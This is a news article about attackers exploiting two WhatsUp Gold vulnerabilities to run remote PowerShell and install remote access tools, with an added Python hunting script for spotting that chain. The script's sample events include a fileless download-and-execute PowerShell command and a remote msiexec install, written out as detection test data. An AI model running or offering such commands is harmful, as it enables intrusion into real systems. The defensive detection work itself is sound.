Two vulnerabilities allow the extraction of encrypted passwords without authentication.
Hackers have begun to actively exploit two critical vulnerabilities in the popular WhatsUp Gold software developed by Progress Software. This solution is widely used to monitor network availability and performance in many organizations.
The vulnerabilities, tracked as CVE-2024-6670 and CVE-2024-6671, could allow attackers to extract encrypted passwords without authentication. In essence, they open a "back door" into systems that ought to be well protected.
The attacks began on August 30, even though Progress Software had released patches on August 16. Many organizations have not yet updated, which is what cybercriminals are taking advantage of. The vulnerabilities were discovered by researcher Sina Kheirkhah. He found the problems on May 22 and reported them to the Zero Day Initiative. On August 30, Kheirkhah published a detailed technical description of the flaws, along with example exploits.
In his report, the researcher explains how insufficient user input validation allows arbitrary passwords to be written into admin account fields. This makes the accounts vulnerable to takeover. Trend Micro reported that hackers began exploiting the vulnerabilities almost immediately after the exploits were published. The first signs of attacks were recorded within five hours of the code appearing in the public domain.
The attackers abuse a legitimate WhatsUp Gold feature called Active Monitor PowerShell Script. With it, they run malicious PowerShell scripts through the NmPoller.exe executable, downloading them from remote URLs. Next, the attackers use the built-in Windows msiexec.exe utility to install various remote access tools (RATs). Among them are Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote. Deploying these RATs gives the attackers a long-term foothold on the compromised systems.
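The chain described above (NmPoller.exe spawning PowerShell that fetches a remote script, followed by msiexec.exe installing a package from a URL) is what a defender would hunt for in process-creation telemetry. The following is an added example, not code from the article, Trend Micro or Progress Software; the event records, install path and 203.0.113.x addresses are constructed sample data, and the field names are assumptions in the shape of Sysmon Event ID 1.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon Event ID 1 shape); not real telemetry.
# The Ipswitch\WhatsUp install path is assumed; adjust to your deployment.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.10/stage.ps1')\""},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://203.0.113.10/agent.msi /qn"},
    # A legitimate Active Monitor script: same parent/child pair, local script, no fetch.
    {"parent": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\check_disk.ps1"},
    # Ordinary local MSI install, should not fire.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\7zip.msi /qn"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
PS_DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\biwr\b|\biex\b",
    re.IGNORECASE)

def _basename(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return (rule_name, severity) for a suspicious event, or None."""
    parent, image = _basename(event["parent"]), _basename(event["image"])
    cmd = event["cmdline"]
    if parent == "nmpoller.exe" and image in ("powershell.exe", "pwsh.exe"):
        # NmPoller legitimately runs PowerShell monitors, so the pair alone is only
        # a hunt lead; a remote fetch inside the command line is the strong signal.
        if REMOTE_URL.search(cmd) or PS_DOWNLOAD.search(cmd):
            return ("nmpoller_powershell_remote_fetch", "high")
        return ("nmpoller_powershell", "medium")
    if image == "msiexec.exe" and REMOTE_URL.search(cmd):
        return ("msiexec_remote_package", "high")
    return None

def hunt(events):
    """Run classify() over a list of events; returns (index, rule, severity) hits."""
    findings = []
    for i, event in enumerate(events):
        hit = classify(event)
        if hit:
            findings.append((i, *hit))
    return findings
```

In a real environment the same two rules translate directly into an EDR or SIEM query on ParentImage, Image and CommandLine; the medium-severity pair is worth baselining against the monitors an administrator has actually configured.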
In some cases, Trend Micro has observed the installation of multiple malicious programs at once. Analysts have not yet been able to attribute these attacks to a specific group, but the use of multiple RATs indicates the possible involvement of ransomware operators.
In a comment to BleepingComputer, Kheirkhah expressed the hope that his research and the published exploits will eventually help improve software security.
This is not the first time in 2024 that WhatsUp Gold has come under attack through publicly available exploits. In early August, the Shadowserver Foundation reported attempts to exploit CVE-2024-4885, a critical remote code execution bug disclosed on June 25. That vulnerability was also discovered by Kheirkhah.
Experts urge all organizations using WhatsUp Gold to immediately install the latest security updates and check their systems for signs of compromise.
Source